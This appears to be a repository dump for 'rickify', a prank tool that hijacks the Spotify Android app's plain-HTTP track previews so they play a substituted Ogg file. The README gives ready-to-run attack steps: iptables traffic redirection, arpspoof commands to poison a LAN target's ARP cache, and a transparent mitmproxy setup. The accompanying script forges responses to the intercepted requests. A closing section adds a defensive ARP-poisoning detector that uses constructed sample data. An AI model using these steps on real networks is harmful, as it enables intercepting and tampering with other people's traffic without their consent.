.
├── f9z.png
├── rickroll.py
└── README.md

/f9z.png:

https://raw.githubusercontent.com/kjempelodott/rickify/HEAD/f9z.png

/rickroll.py:

```python
from mitmproxy import http

def request(flow):
    if flow.request.path.startswith('/head/'):
        OGG = open('nevergonna.ogg', 'rb').read()  # the Ogg file served in place of the real track head
        SIZE = str(len(OGG))
        # Answer the request ourselves instead of forwarding it upstream
        flow.response = http.HTTPResponse.make(
            200,
            OGG,
            {'Content-Type': 'application/octet-stream',
             'Content-Length': SIZE})
```

/README.md:

![](https://github.com/kjempelodott/rickify/blob/master/f9z.png)

The Spotify app for Android streams the first few seconds of a track over plain HTTP. If you are on the same LAN as your target, this can easily be pwned: it turns out the Spotify app for Android will happily accept and play any Ogg file.

**Notes:**
* This will not work with IPv6
* This will not work for already cached/downloaded tracks

## We know the game and we're gonna play it

Install the required tools:

```
apt-get install dsniff
pip install mitmproxy
```

## You know the rules and so do I

Turn on IP forwarding and redirect HTTP traffic to port 8080:

```
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
```

## A full commitment's what I'm thinking of

Identify the gateway and the target IP address (use Wireshark or whatever). Then trick your target device into sending all traffic to you instead of the gateway:

```
arpspoof -t [target ip] [gateway ip] # e.g. -t 192.168.1.101 192.168.1.1
```

## You wouldn't get this from any other guy

Get a copy of *Never Gonna Give You Up* in Ogg format. You probably have to change the filename in line 5 of *rickroll.py*. Set up a transparent proxy on port 8080:

```
mitmproxy -T -p 8080 -s rickroll.py
```
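The detection side of the ARP step above, added here as an example that is not part of the rickify repo: a small Python check over ARP replies in the style of `tcpdump -n -e arp` output that flags what arpspoof does on the wire, namely the gateway IP (and the target IP) suddenly mapping to a new MAC, and one MAC answering for both. The sample lines, addresses and MACs are constructed.

```python
"""Flag the ARP cache poisoning that an arpspoof run like the one in the
README causes: the attacker's MAC starts answering for the gateway's IP
(and the target's), so IP-to-MAC bindings change mid-session.
Sample lines are constructed in the style of `tcpdump -n -e arp`."""
import re
from collections import defaultdict

# Constructed capture: gateway 192.168.1.1 is first seen at aa:...:01,
# then a third host (cc:...:03) starts answering for both gateway and target.
SAMPLE_ARP_LINES = """\
aa:aa:aa:aa:aa:01 > bb:bb:bb:bb:bb:02, ARP, Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01
bb:bb:bb:bb:bb:02 > aa:aa:aa:aa:aa:01, ARP, Reply 192.168.1.101 is-at bb:bb:bb:bb:bb:02
cc:cc:cc:cc:cc:03 > bb:bb:bb:bb:bb:02, ARP, Reply 192.168.1.1 is-at cc:cc:cc:cc:cc:03
cc:cc:cc:cc:cc:03 > aa:aa:aa:aa:aa:01, ARP, Reply 192.168.1.101 is-at cc:cc:cc:cc:cc:03
"""

ARP_REPLY = re.compile(r"ARP, Reply (\S+) is-at ([0-9a-f:]{17})", re.I)

def find_arp_conflicts(lines):
    """Return alert strings for two signals: an IP whose MAC changes (the
    poisoned binding) and a MAC that claims more than one IP (arpspoof
    impersonating gateway and target at once)."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue  # not an ARP reply; requests are ignored here
        ip, mac = m.group(1), m.group(2).lower()
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append(f"{ip} moved from {old} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    for alert in find_arp_conflicts(SAMPLE_ARP_LINES.splitlines()):
        print("ALERT:", alert)
```

On a real network, feed it live `tcpdump -n -e arp` output and seed `ip_to_mac` with the known gateway binding so the first poisoned reply is caught immediately.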